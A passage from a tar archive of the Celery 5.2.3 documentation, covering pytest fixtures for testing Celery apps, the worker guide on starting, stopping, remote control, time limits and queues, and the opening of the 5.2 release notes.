@pytest.fixture(scope='session') def celery_config(): return { 'broker_url': 'amqp://', 'result_backend': 'redis://' } def test_add(celery_worker): mytask.delay() # If you wish to override some setting in one test cases # only - you can use the ``celery`` mark: @pytest.mark.celery(result_backend='rpc') def test_other(celery_worker): ... Heartbeats are disabled by default which means that the test worker doesn't send events for ``worker-online``, ``worker-offline`` and ``worker-heartbeat``. To enable heartbeats modify the :func:`celery_worker_parameters` fixture: .. code-block:: python # Put this in your conftest.py @pytest.fixture(scope="session") def celery_worker_parameters(): return {"without_heartbeat": False} ... Session scope ^^^^^^^^^^^^^ ``celery_config`` - Override to setup Celery test app configuration. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can redefine this fixture to configure the test Celery app. The config returned by your fixture will then be used to configure the :func:`celery_app`, and :func:`celery_session_app` fixtures. Example: .. code-block:: python @pytest.fixture(scope='session') def celery_config(): return { 'broker_url': 'amqp://', 'result_backend': 'rpc', } ``celery_parameters`` - Override to setup Celery test app parameters. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can redefine this fixture to change the ``__init__`` parameters of test Celery app. In contrast to :func:`celery_config`, these are directly passed to when instantiating :class:`~celery.Celery`. The config returned by your fixture will then be used to configure the :func:`celery_app`, and :func:`celery_session_app` fixtures. Example: .. code-block:: python @pytest.fixture(scope='session') def celery_parameters(): return { 'task_cls': my.package.MyCustomTaskClass, 'strict_typing': False, } ``celery_worker_parameters`` - Override to setup Celery worker parameters. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can redefine this fixture to change the ``__init__`` parameters of test Celery workers. These are directly passed to :class:`~celery.worker.WorkController` when it is instantiated. The config returned by your fixture will then be used to configure the :func:`celery_worker`, and :func:`celery_session_worker` fixtures. Example: .. code-block:: python @pytest.fixture(scope='session') def celery_worker_parameters(): return { 'queues': ('high-prio', 'low-prio'), 'exclude_queues': ('celery'), } ``celery_enable_logging`` - Override to enable logging in embedded workers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is a fixture you can override to enable logging in embedded workers. Example: .. code-block:: python @pytest.fixture(scope='session') def celery_enable_logging(): return True ``celery_includes`` - Add additional imports for embedded workers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can override fixture to include modules when an embedded worker starts. You can have this return a list of module names to import, which can be task modules, modules registering signals, and so on. Example: .. code-block:: python @pytest.fixture(scope='session') def celery_includes(): return [ 'proj.tests.tasks', 'proj.tests.celery_signal_handlers', ] ``celery_worker_pool`` - Override the pool used for embedded workers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can override fixture to configure the execution pool used for embedded workers. Example: .. code-block:: python @pytest.fixture(scope='session') def celery_worker_pool(): return 'prefork' .. warning:: You cannot use the gevent/eventlet pools, that is unless your whole test suite is running with the monkeypatches enabled. ``celery_session_worker`` - Embedded worker that lives throughout the session. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This fixture starts a worker that lives throughout the testing session (it won't be started/stopped for every test). Example: .. code-block:: python # Add this to your conftest.py @pytest.fixture(scope='session') def celery_config(): return { 'broker_url': 'amqp://', 'result_backend': 'rpc', } # Do this in your tests. def test_add_task(celery_session_worker): assert add.delay(2, 2) == 4 .. warning:: It's probably a bad idea to mix session and ephemeral workers... ``celery_session_app`` - Celery app used for testing (session scope). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This can be used by other session scoped fixtures when they need to refer to a Celery app instance. ``use_celery_app_trap`` - Raise exception on falling back to default app. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is a fixture you can override in your ``conftest.py``, to enable the "app trap": if something tries to access the default or current_app, an exception is raised. Example: .. code-block:: python @pytest.fixture(scope='session') def use_celery_app_trap(): return True If a test wants to access the default app, you would have to mark it using the ``depends_on_current_app`` fixture: .. code-block:: python @pytest.mark.usefixtures('depends_on_current_app') def test_something(): something() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/workers.rst0000664000175000017500000007373400000000000020065 0ustar00asifasif00000000000000.. _guide-workers: =============== Workers Guide =============== .. contents:: :local: :depth: 1 .. _worker-starting: Starting the worker =================== .. sidebar:: Daemonizing You probably want to use a daemonization tool to start the worker in the background. See :ref:`daemonizing` for help starting the worker as a daemon using popular service managers. You can start the worker in the foreground by executing the command: .. code-block:: console $ celery -A proj worker -l INFO For a full list of available command-line options see :mod:`~celery.bin.worker`, or simply do: .. code-block:: console $ celery worker --help You can start multiple workers on the same machine, but be sure to name each individual worker by specifying a node name with the :option:`--hostname ` argument: .. code-block:: console $ celery -A proj worker --loglevel=INFO --concurrency=10 -n worker1@%h $ celery -A proj worker --loglevel=INFO --concurrency=10 -n worker2@%h $ celery -A proj worker --loglevel=INFO --concurrency=10 -n worker3@%h The ``hostname`` argument can expand the following variables: - ``%h``: Hostname, including domain name. - ``%n``: Hostname only. - ``%d``: Domain name only. If the current hostname is *george.example.com*, these will expand to: +----------+----------------+------------------------------+ | Variable | Template | Result | +----------+----------------+------------------------------+ | ``%h`` | ``worker1@%h`` | *worker1@george.example.com* | +----------+----------------+------------------------------+ | ``%n`` | ``worker1@%n`` | *worker1@george* | +----------+----------------+------------------------------+ | ``%d`` | ``worker1@%d`` | *worker1@example.com* | +----------+----------------+------------------------------+ .. admonition:: Note for :pypi:`supervisor` users The ``%`` sign must be escaped by adding a second one: `%%h`. .. _worker-stopping: Stopping the worker =================== Shutdown should be accomplished using the :sig:`TERM` signal. When shutdown is initiated the worker will finish all currently executing tasks before it actually terminates. If these tasks are important, you should wait for it to finish before doing anything drastic, like sending the :sig:`KILL` signal. If the worker won't shutdown after considerate time, for being stuck in an infinite-loop or similar, you can use the :sig:`KILL` signal to force terminate the worker: but be aware that currently executing tasks will be lost (i.e., unless the tasks have the :attr:`~@Task.acks_late` option set). Also as processes can't override the :sig:`KILL` signal, the worker will not be able to reap its children; make sure to do so manually. This command usually does the trick: .. code-block:: console $ pkill -9 -f 'celery worker' If you don't have the :command:`pkill` command on your system, you can use the slightly longer version: .. code-block:: console $ ps auxww | awk '/celery worker/ {print $2}' | xargs kill -9 .. versionchanged:: 5.2 On Linux systems, Celery now supports sending :sig:`KILL` signal to all child processes after worker termination. This is done via `PR_SET_PDEATHSIG` option of ``prctl(2)``. .. _worker-restarting: Restarting the worker ===================== To restart the worker you should send the `TERM` signal and start a new instance. The easiest way to manage workers for development is by using `celery multi`: .. code-block:: console $ celery multi start 1 -A proj -l INFO -c4 --pidfile=/var/run/celery/%n.pid $ celery multi restart 1 --pidfile=/var/run/celery/%n.pid For production deployments you should be using init-scripts or a process supervision system (see :ref:`daemonizing`). Other than stopping, then starting the worker to restart, you can also restart the worker using the :sig:`HUP` signal. Note that the worker will be responsible for restarting itself so this is prone to problems and isn't recommended in production: .. code-block:: console $ kill -HUP $pid .. note:: Restarting by :sig:`HUP` only works if the worker is running in the background as a daemon (it doesn't have a controlling terminal). :sig:`HUP` is disabled on macOS because of a limitation on that platform. .. _worker-process-signals: Process Signals =============== The worker's main process overrides the following signals: +--------------+-------------------------------------------------+ | :sig:`TERM` | Warm shutdown, wait for tasks to complete. | +--------------+-------------------------------------------------+ | :sig:`QUIT` | Cold shutdown, terminate ASAP | +--------------+-------------------------------------------------+ | :sig:`USR1` | Dump traceback for all active threads. | +--------------+-------------------------------------------------+ | :sig:`USR2` | Remote debug, see :mod:`celery.contrib.rdb`. | +--------------+-------------------------------------------------+ .. _worker-files: Variables in file paths ======================= The file path arguments for :option:`--logfile `, :option:`--pidfile `, and :option:`--statedb ` can contain variables that the worker will expand: Node name replacements ---------------------- - ``%p``: Full node name. - ``%h``: Hostname, including domain name. - ``%n``: Hostname only. - ``%d``: Domain name only. - ``%i``: Prefork pool process index or 0 if MainProcess. - ``%I``: Prefork pool process index with separator. For example, if the current hostname is ``george@foo.example.com`` then these will expand to: - ``--logfile=%p.log`` -> :file:`george@foo.example.com.log` - ``--logfile=%h.log`` -> :file:`foo.example.com.log` - ``--logfile=%n.log`` -> :file:`george.log` - ``--logfile=%d.log`` -> :file:`example.com.log` .. _worker-files-process-index: Prefork pool process index -------------------------- The prefork pool process index specifiers will expand into a different filename depending on the process that'll eventually need to open the file. This can be used to specify one log file per child process. Note that the numbers will stay within the process limit even if processes exit or if autoscale/``maxtasksperchild``/time limits are used. That is, the number is the *process index* not the process count or pid. * ``%i`` - Pool process index or 0 if MainProcess. Where ``-n worker1@example.com -c2 -f %n-%i.log`` will result in three log files: - :file:`worker1-0.log` (main process) - :file:`worker1-1.log` (pool process 1) - :file:`worker1-2.log` (pool process 2) * ``%I`` - Pool process index with separator. Where ``-n worker1@example.com -c2 -f %n%I.log`` will result in three log files: - :file:`worker1.log` (main process) - :file:`worker1-1.log` (pool process 1) - :file:`worker1-2.log` (pool process 2) .. _worker-concurrency: Concurrency =========== By default multiprocessing is used to perform concurrent execution of tasks, but you can also use :ref:`Eventlet `. The number of worker processes/threads can be changed using the :option:`--concurrency ` argument and defaults to the number of CPUs available on the machine. .. admonition:: Number of processes (multiprocessing/prefork pool) More pool processes are usually better, but there's a cut-off point where adding more pool processes affects performance in negative ways. There's even some evidence to support that having multiple worker instances running, may perform better than having a single worker. For example 3 workers with 10 pool processes each. You need to experiment to find the numbers that works best for you, as this varies based on application, work load, task run times and other factors. .. _worker-remote-control: Remote control ============== .. versionadded:: 2.0 .. sidebar:: The ``celery`` command The :program:`celery` program is used to execute remote control commands from the command-line. It supports all of the commands listed below. See :ref:`monitoring-control` for more information. :pool support: *prefork, eventlet, gevent, thread*, blocking:*solo* (see note) :broker support: *amqp, redis* Workers have the ability to be remote controlled using a high-priority broadcast message queue. The commands can be directed to all, or a specific list of workers. Commands can also have replies. The client can then wait for and collect those replies. Since there's no central authority to know how many workers are available in the cluster, there's also no way to estimate how many workers may send a reply, so the client has a configurable timeout — the deadline in seconds for replies to arrive in. This timeout defaults to one second. If the worker doesn't reply within the deadline it doesn't necessarily mean the worker didn't reply, or worse is dead, but may simply be caused by network latency or the worker being slow at processing commands, so adjust the timeout accordingly. In addition to timeouts, the client can specify the maximum number of replies to wait for. If a destination is specified, this limit is set to the number of destination hosts. .. note:: The ``solo`` pool supports remote control commands, but any task executing will block any waiting control command, so it is of limited use if the worker is very busy. In that case you must increase the timeout waiting for replies in the client. .. _worker-broadcast-fun: The :meth:`~@control.broadcast` function ---------------------------------------------------- This is the client function used to send commands to the workers. Some remote control commands also have higher-level interfaces using :meth:`~@control.broadcast` in the background, like :meth:`~@control.rate_limit`, and :meth:`~@control.ping`. Sending the :control:`rate_limit` command and keyword arguments: .. code-block:: pycon >>> app.control.broadcast('rate_limit', ... arguments={'task_name': 'myapp.mytask', ... 'rate_limit': '200/m'}) This will send the command asynchronously, without waiting for a reply. To request a reply you have to use the `reply` argument: .. code-block:: pycon >>> app.control.broadcast('rate_limit', { ... 'task_name': 'myapp.mytask', 'rate_limit': '200/m'}, reply=True) [{'worker1.example.com': 'New rate limit set successfully'}, {'worker2.example.com': 'New rate limit set successfully'}, {'worker3.example.com': 'New rate limit set successfully'}] Using the `destination` argument you can specify a list of workers to receive the command: .. code-block:: pycon >>> app.control.broadcast('rate_limit', { ... 'task_name': 'myapp.mytask', ... 'rate_limit': '200/m'}, reply=True, ... destination=['worker1@example.com']) [{'worker1.example.com': 'New rate limit set successfully'}] Of course, using the higher-level interface to set rate limits is much more convenient, but there are commands that can only be requested using :meth:`~@control.broadcast`. Commands ======== .. control:: revoke ``revoke``: Revoking tasks -------------------------- :pool support: all, terminate only supported by prefork and eventlet :broker support: *amqp, redis* :command: :program:`celery -A proj control revoke ` All worker nodes keeps a memory of revoked task ids, either in-memory or persistent on disk (see :ref:`worker-persistent-revokes`). When a worker receives a revoke request it will skip executing the task, but it won't terminate an already executing task unless the `terminate` option is set. .. note:: The terminate option is a last resort for administrators when a task is stuck. It's not for terminating the task, it's for terminating the process that's executing the task, and that process may have already started processing another task at the point when the signal is sent, so for this reason you must never call this programmatically. If `terminate` is set the worker child process processing the task will be terminated. The default signal sent is `TERM`, but you can specify this using the `signal` argument. Signal can be the uppercase name of any signal defined in the :mod:`signal` module in the Python Standard Library. Terminating a task also revokes it. **Example** .. code-block:: pycon >>> result.revoke() >>> AsyncResult(id).revoke() >>> app.control.revoke('d9078da5-9915-40a0-bfa1-392c7bde42ed') >>> app.control.revoke('d9078da5-9915-40a0-bfa1-392c7bde42ed', ... terminate=True) >>> app.control.revoke('d9078da5-9915-40a0-bfa1-392c7bde42ed', ... terminate=True, signal='SIGKILL') Revoking multiple tasks ----------------------- .. versionadded:: 3.1 The revoke method also accepts a list argument, where it will revoke several tasks at once. **Example** .. code-block:: pycon >>> app.control.revoke([ ... '7993b0aa-1f0b-4780-9af0-c47c0858b3f2', ... 'f565793e-b041-4b2b-9ca4-dca22762a55d', ... 'd9d35e03-2997-42d0-a13e-64a66b88a618', ]) The ``GroupResult.revoke`` method takes advantage of this since version 3.1. .. _worker-persistent-revokes: Persistent revokes ------------------ Revoking tasks works by sending a broadcast message to all the workers, the workers then keep a list of revoked tasks in memory. When a worker starts up it will synchronize revoked tasks with other workers in the cluster. The list of revoked tasks is in-memory so if all workers restart the list of revoked ids will also vanish. If you want to preserve this list between restarts you need to specify a file for these to be stored in by using the `--statedb` argument to :program:`celery worker`: .. code-block:: console $ celery -A proj worker -l INFO --statedb=/var/run/celery/worker.state or if you use :program:`celery multi` you want to create one file per worker instance so use the `%n` format to expand the current node name: .. code-block:: console celery multi start 2 -l INFO --statedb=/var/run/celery/%n.state See also :ref:`worker-files` Note that remote control commands must be working for revokes to work. Remote control commands are only supported by the RabbitMQ (amqp) and Redis at this point. .. _worker-time-limits: Time Limits =========== .. versionadded:: 2.0 :pool support: *prefork/gevent (see note below)* .. sidebar:: Soft, or hard? The time limit is set in two values, `soft` and `hard`. The soft time limit allows the task to catch an exception to clean up before it is killed: the hard timeout isn't catch-able and force terminates the task. A single task can potentially run forever, if you have lots of tasks waiting for some event that'll never happen you'll block the worker from processing new tasks indefinitely. The best way to defend against this scenario happening is enabling time limits. The time limit (`--time-limit`) is the maximum number of seconds a task may run before the process executing it is terminated and replaced by a new process. You can also enable a soft time limit (`--soft-time-limit`), this raises an exception the task can catch to clean up before the hard time limit kills it: .. code-block:: python from myapp import app from celery.exceptions import SoftTimeLimitExceeded @app.task def mytask(): try: do_work() except SoftTimeLimitExceeded: clean_up_in_a_hurry() Time limits can also be set using the :setting:`task_time_limit` / :setting:`task_soft_time_limit` settings. .. note:: Time limits don't currently work on platforms that don't support the :sig:`SIGUSR1` signal. .. note:: The gevent pool does not implement soft time limits. Additionally, it will not enforce the hard time limit if the task is blocking. Changing time limits at run-time -------------------------------- .. versionadded:: 2.3 :broker support: *amqp, redis* There's a remote control command that enables you to change both soft and hard time limits for a task — named ``time_limit``. Example changing the time limit for the ``tasks.crawl_the_web`` task to have a soft time limit of one minute, and a hard time limit of two minutes: .. code-block:: pycon >>> app.control.time_limit('tasks.crawl_the_web', soft=60, hard=120, reply=True) [{'worker1.example.com': {'ok': 'time limits set successfully'}}] Only tasks that starts executing after the time limit change will be affected. .. _worker-rate-limits: Rate Limits =========== .. control:: rate_limit Changing rate-limits at run-time -------------------------------- Example changing the rate limit for the `myapp.mytask` task to execute at most 200 tasks of that type every minute: .. code-block:: pycon >>> app.control.rate_limit('myapp.mytask', '200/m') The above doesn't specify a destination, so the change request will affect all worker instances in the cluster. If you only want to affect a specific list of workers you can include the ``destination`` argument: .. code-block:: pycon >>> app.control.rate_limit('myapp.mytask', '200/m', ... destination=['celery@worker1.example.com']) .. warning:: This won't affect workers with the :setting:`worker_disable_rate_limits` setting enabled. .. _worker-max-tasks-per-child: Max tasks per child setting =========================== .. versionadded:: 2.0 :pool support: *prefork* With this option you can configure the maximum number of tasks a worker can execute before it's replaced by a new process. This is useful if you have memory leaks you have no control over for example from closed source C extensions. The option can be set using the workers :option:`--max-tasks-per-child ` argument or using the :setting:`worker_max_tasks_per_child` setting. .. _worker-max-memory-per-child: Max memory per child setting ============================ .. versionadded:: 4.0 :pool support: *prefork* With this option you can configure the maximum amount of resident memory a worker can execute before it's replaced by a new process. This is useful if you have memory leaks you have no control over for example from closed source C extensions. The option can be set using the workers :option:`--max-memory-per-child ` argument or using the :setting:`worker_max_memory_per_child` setting. .. _worker-autoscaling: Autoscaling =========== .. versionadded:: 2.2 :pool support: *prefork*, *gevent* The *autoscaler* component is used to dynamically resize the pool based on load: - The autoscaler adds more pool processes when there is work to do, - and starts removing processes when the workload is low. It's enabled by the :option:`--autoscale ` option, which needs two numbers: the maximum and minimum number of pool processes: .. code-block:: text --autoscale=AUTOSCALE Enable autoscaling by providing max_concurrency,min_concurrency. Example: --autoscale=10,3 (always keep 3 processes, but grow to 10 if necessary). You can also define your own rules for the autoscaler by subclassing :class:`~celery.worker.autoscaler.Autoscaler`. Some ideas for metrics include load average or the amount of memory available. You can specify a custom autoscaler with the :setting:`worker_autoscaler` setting. .. _worker-queues: Queues ====== A worker instance can consume from any number of queues. By default it will consume from all queues defined in the :setting:`task_queues` setting (that if not specified falls back to the default queue named ``celery``). You can specify what queues to consume from at start-up, by giving a comma separated list of queues to the :option:`-Q ` option: .. code-block:: console $ celery -A proj worker -l INFO -Q foo,bar,baz If the queue name is defined in :setting:`task_queues` it will use that configuration, but if it's not defined in the list of queues Celery will automatically generate a new queue for you (depending on the :setting:`task_create_missing_queues` option). You can also tell the worker to start and stop consuming from a queue at run-time using the remote control commands :control:`add_consumer` and :control:`cancel_consumer`. .. control:: add_consumer Queues: Adding consumers ------------------------ The :control:`add_consumer` control command will tell one or more workers to start consuming from a queue. This operation is idempotent. To tell all workers in the cluster to start consuming from a queue named "``foo``" you can use the :program:`celery control` program: .. code-block:: console $ celery -A proj control add_consumer foo -> worker1.local: OK started consuming from u'foo' If you want to specify a specific worker you can use the :option:`--destination ` argument: .. code-block:: console $ celery -A proj control add_consumer foo -d celery@worker1.local The same can be accomplished dynamically using the :meth:`@control.add_consumer` method: .. code-block:: pycon >>> app.control.add_consumer('foo', reply=True) [{u'worker1.local': {u'ok': u"already consuming from u'foo'"}}] >>> app.control.add_consumer('foo', reply=True, ... destination=['worker1@example.com']) [{u'worker1.local': {u'ok': u"already consuming from u'foo'"}}] By now we've only shown examples using automatic queues, If you need more control you can also specify the exchange, routing_key and even other options: .. code-block:: pycon >>> app.control.add_consumer( ... queue='baz', ... exchange='ex', ... exchange_type='topic', ... routing_key='media.*', ... options={ ... 'queue_durable': False, ... 'exchange_durable': False, ... }, ... reply=True, ... destination=['w1@example.com', 'w2@example.com']) .. control:: cancel_consumer Queues: Canceling consumers --------------------------- You can cancel a consumer by queue name using the :control:`cancel_consumer` control command. To force all workers in the cluster to cancel consuming from a queue you can use the :program:`celery control` program: .. code-block:: console $ celery -A proj control cancel_consumer foo The :option:`--destination ` argument can be used to specify a worker, or a list of workers, to act on the command: .. code-block:: console $ celery -A proj control cancel_consumer foo -d celery@worker1.local You can also cancel consumers programmatically using the :meth:`@control.cancel_consumer` method: .. code-block:: console >>> app.control.cancel_consumer('foo', reply=True) [{u'worker1.local': {u'ok': u"no longer consuming from u'foo'"}}] .. control:: active_queues Queues: List of active queues ----------------------------- You can get a list of queues that a worker consumes from by using the :control:`active_queues` control command: .. code-block:: console $ celery -A proj inspect active_queues [...] Like all other remote control commands this also supports the :option:`--destination ` argument used to specify the workers that should reply to the request: .. code-block:: console $ celery -A proj inspect active_queues -d celery@worker1.local [...] This can also be done programmatically by using the :meth:`~celery.app.control.Inspect.active_queues` method: .. code-block:: pycon >>> app.control.inspect().active_queues() [...] >>> app.control.inspect(['worker1.local']).active_queues() [...] .. _worker-inspect: Inspecting workers ================== :class:`@control.inspect` lets you inspect running workers. It uses remote control commands under the hood. You can also use the ``celery`` command to inspect workers, and it supports the same commands as the :class:`@control` interface. .. code-block:: pycon >>> # Inspect all nodes. >>> i = app.control.inspect() >>> # Specify multiple nodes to inspect. >>> i = app.control.inspect(['worker1.example.com', 'worker2.example.com']) >>> # Specify a single node to inspect. >>> i = app.control.inspect('worker1.example.com') .. _worker-inspect-registered-tasks: Dump of registered tasks ------------------------ You can get a list of tasks registered in the worker using the :meth:`~celery.app.control.Inspect.registered`: .. code-block:: pycon >>> i.registered() [{'worker1.example.com': ['tasks.add', 'tasks.sleeptask']}] .. _worker-inspect-active-tasks: Dump of currently executing tasks --------------------------------- You can get a list of active tasks using :meth:`~celery.app.control.Inspect.active`: .. code-block:: pycon >>> i.active() [{'worker1.example.com': [{'name': 'tasks.sleeptask', 'id': '32666e9b-809c-41fa-8e93-5ae0c80afbbf', 'args': '(8,)', 'kwargs': '{}'}]}] .. _worker-inspect-eta-schedule: Dump of scheduled (ETA) tasks ----------------------------- You can get a list of tasks waiting to be scheduled by using :meth:`~celery.app.control.Inspect.scheduled`: .. code-block:: pycon >>> i.scheduled() [{'worker1.example.com': [{'eta': '2010-06-07 09:07:52', 'priority': 0, 'request': { 'name': 'tasks.sleeptask', 'id': '1a7980ea-8b19-413e-91d2-0b74f3844c4d', 'args': '[1]', 'kwargs': '{}'}}, {'eta': '2010-06-07 09:07:53', 'priority': 0, 'request': { 'name': 'tasks.sleeptask', 'id': '49661b9a-aa22-4120-94b7-9ee8031d219d', 'args': '[2]', 'kwargs': '{}'}}]}] .. note:: These are tasks with an ETA/countdown argument, not periodic tasks. .. _worker-inspect-reserved: Dump of reserved tasks ---------------------- Reserved tasks are tasks that have been received, but are still waiting to be executed. You can get a list of these using :meth:`~celery.app.control.Inspect.reserved`: .. code-block:: pycon >>> i.reserved() [{'worker1.example.com': [{'name': 'tasks.sleeptask', 'id': '32666e9b-809c-41fa-8e93-5ae0c80afbbf', 'args': '(8,)', 'kwargs': '{}'}]}] .. _worker-statistics: Statistics ---------- The remote control command ``inspect stats`` (or :meth:`~celery.app.control.Inspect.stats`) will give you a long list of useful (or not so useful) statistics about the worker: .. code-block:: console $ celery -A proj inspect stats For the output details, consult the reference documentation of :meth:`~celery.app.control.Inspect.stats`. Additional Commands =================== .. control:: shutdown Remote shutdown --------------- This command will gracefully shut down the worker remotely: .. code-block:: pycon >>> app.control.broadcast('shutdown') # shutdown all workers >>> app.control.broadcast('shutdown', destination='worker1@example.com') .. control:: ping Ping ---- This command requests a ping from alive workers. The workers reply with the string 'pong', and that's just about it. It will use the default one second timeout for replies unless you specify a custom timeout: .. code-block:: pycon >>> app.control.ping(timeout=0.5) [{'worker1.example.com': 'pong'}, {'worker2.example.com': 'pong'}, {'worker3.example.com': 'pong'}] :meth:`~@control.ping` also supports the `destination` argument, so you can specify the workers to ping: .. code-block:: pycon >>> ping(['worker2.example.com', 'worker3.example.com']) [{'worker2.example.com': 'pong'}, {'worker3.example.com': 'pong'}] .. _worker-enable-events: .. control:: enable_events .. control:: disable_events Enable/disable events --------------------- You can enable/disable events by using the `enable_events`, `disable_events` commands. This is useful to temporarily monitor a worker using :program:`celery events`/:program:`celerymon`. .. code-block:: pycon >>> app.control.enable_events() >>> app.control.disable_events() .. _worker-custom-control-commands: Writing your own remote control commands ======================================== There are two types of remote control commands: - Inspect command Does not have side effects, will usually just return some value found in the worker, like the list of currently registered tasks, the list of active tasks, etc. - Control command Performs side effects, like adding a new queue to consume from. Remote control commands are registered in the control panel and they take a single argument: the current :class:`~celery.worker.control.ControlDispatch` instance. From there you have access to the active :class:`~celery.worker.consumer.Consumer` if needed. Here's an example control command that increments the task prefetch count: .. code-block:: python from celery.worker.control import control_command @control_command( args=[('n', int)], signature='[N=1]', # <- used for help on the command-line. ) def increase_prefetch_count(state, n=1): state.consumer.qos.increment_eventually(n) return {'ok': 'prefetch count incremented'} Make sure you add this code to a module that is imported by the worker: this could be the same module as where your Celery app is defined, or you can add the module to the :setting:`imports` setting. Restart the worker so that the control command is registered, and now you can call your command using the :program:`celery control` utility: .. code-block:: console $ celery -A proj control increase_prefetch_count 3 You can also add actions to the :program:`celery inspect` program, for example one that reads the current prefetch count: .. code-block:: python from celery.worker.control import inspect_command @inspect_command() def current_prefetch_count(state): return {'prefetch_count': state.consumer.qos.value} After restarting the worker you can now query this value using the :program:`celery inspect` program: .. code-block:: console $ celery -A proj inspect current_prefetch_count ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/whatsnew-5.2.rst0000664000175000017500000003077700000000000016537 0ustar00asifasif00000000000000.. _whatsnew-5.2: ========================================= What's new in Celery 5.2 (Dawn Chorus) ========================================= :Author: Omer Katz (``omer.drow at gmail.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and reliable distributed programming framework to process vast amounts of messages, while providing operations with the tools required to maintain a distributed system with python. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. .. note:: Following the problems with Freenode, we migrated our IRC channel to Libera Chat as most projects did. You can also join us using `Gitter `_. We're sometimes there to answer questions. We welcome you to join. To read more about Celery you should go read the :ref:`introduction `. While this version is **mostly** backward compatible with previous versions it's important that you read the following section as this release is a new major version. This version is officially supported on CPython 3.7 & 3.8 & 3.9 and is also supported on PyPy3. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= .. note:: **This release contains fixes for two (potentially severe) memory leaks. We encourage our users to upgrade to this release as soon as possible.** The 5.2.0 release is a new minor release for Celery. Releases in the 5.x series are codenamed after songs of `Jon Hopkins `_. This release has been codenamed `Dawn Chorus `_. From now on we only support Python 3.7 and above. We will maintain compatibility with Python 3.7 until it's EOL in June, 2023. *— Omer Katz* Long Term Support Policy ------------------------ We no longer support Celery 4.x as we don't have the resources to do so. If you'd like to help us, all contributions are welcome. Celery 5.x **is not** an LTS release. We will support it until the release of Celery 6.x. We're in the process of defining our Long Term Support policy. Watch the next "What's New" document for updates. Wall of Contributors -------------------- .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. Upgrading from Celery 4.x ========================= Step 1: Adjust your command line invocation ------------------------------------------- Celery 5.0 introduces a new CLI implementation which isn't completely backwards compatible. The global options can no longer be positioned after the sub-command. Instead, they must be positioned as an option for the `celery` command like so:: celery --app path.to.app worker If you were using our :ref:`daemonizing` guide to deploy Celery in production, you should revisit it for updates. Step 2: Update your configuration with the new setting names ------------------------------------------------------------ If you haven't already updated your configuration when you migrated to Celery 4.0, please do so now. We elected to extend the deprecation period until 6.0 since we did not loudly warn about using these deprecated settings. Please refer to the :ref:`migration guide ` for instructions. Step 3: Read the important notes in this document ------------------------------------------------- Make sure you are not affected by any of the important upgrade notes mentioned in the :ref:`following section `. You should verify that none of the breaking changes in the CLI do not affect you. Please refer to :ref:`New Command Line Interface ` for details. Step 4: Migrate your code to Python 3 ------------------------------------- Celery 5.x only supports Python 3. Therefore, you must ensure your code is compatible with Python 3. If you haven't ported your code to Python 3, you must do so before upgrading. You can use tools like `2to3 `_ and `pyupgrade `_ to assist you with this effort. After the migration is done, run your test suite with Celery 4 to ensure nothing has been broken. Step 5: Upgrade to Celery 5.2 ----------------------------- At this point you can upgrade your workers and clients with the new version. .. _v520-important: Important Notes =============== Supported Python Versions ------------------------- The supported Python versions are: - CPython 3.7 - CPython 3.8 - CPython 3.9 - PyPy3.7 7.3 (``pypy3``) Experimental support ~~~~~~~~~~~~~~~~~~~~ Celery supports these Python versions provisionally as they are not production ready yet: - CPython 3.10 (currently in RC2) Memory Leak Fixes ----------------- Two severe memory leaks have been fixed in this version: * :class:`celery.result.ResultSet` no longer holds a circular reference to itself. * The prefork pool no longer keeps messages in its cache forever when the master process disconnects from the broker. The first memory leak occurs when you use :class:`celery.result.ResultSet`. Each instance held a promise which provides that instance as an argument to the promise's callable. This caused a circular reference which kept the ResultSet instance in memory forever since the GC couldn't evict it. The provided argument is now a :func:`weakref.proxy` of the ResultSet's instance. The memory leak mainly occurs when you use :class:`celery.result.GroupResult` since it inherits from :class:`celery.result.ResultSet` which doesn't get used that often. The second memory leak exists since the inception of the project. The prefork pool maintains a cache of the jobs it executes. When they are complete, they are evicted from the cache. However, when Celery disconnects from the broker, we flush the pool and discard the jobs, expecting that they'll be cleared later once the worker acknowledges them but that has never been the case. Instead, these jobs remain forever in memory. We now discard those jobs immediately while flushing. Dropped support for Python 3.6 ------------------------------ Celery now requires Python 3.7 and above. Python 3.6 will reach EOL in December, 2021. In order to focus our efforts we have dropped support for Python 3.6 in this version. If you still require to run Celery using Python 3.6 you can still use Celery 5.1. However we encourage you to upgrade to a supported Python version since no further security patches will be applied for Python 3.6 after the 23th of December, 2021. Tasks ----- When replacing a task with another task, we now give an indication of the replacing nesting level through the ``replaced_task_nesting`` header. A task which was never replaced has a ``replaced_task_nesting`` value of 0. Kombu ----- Starting from v5.2, the 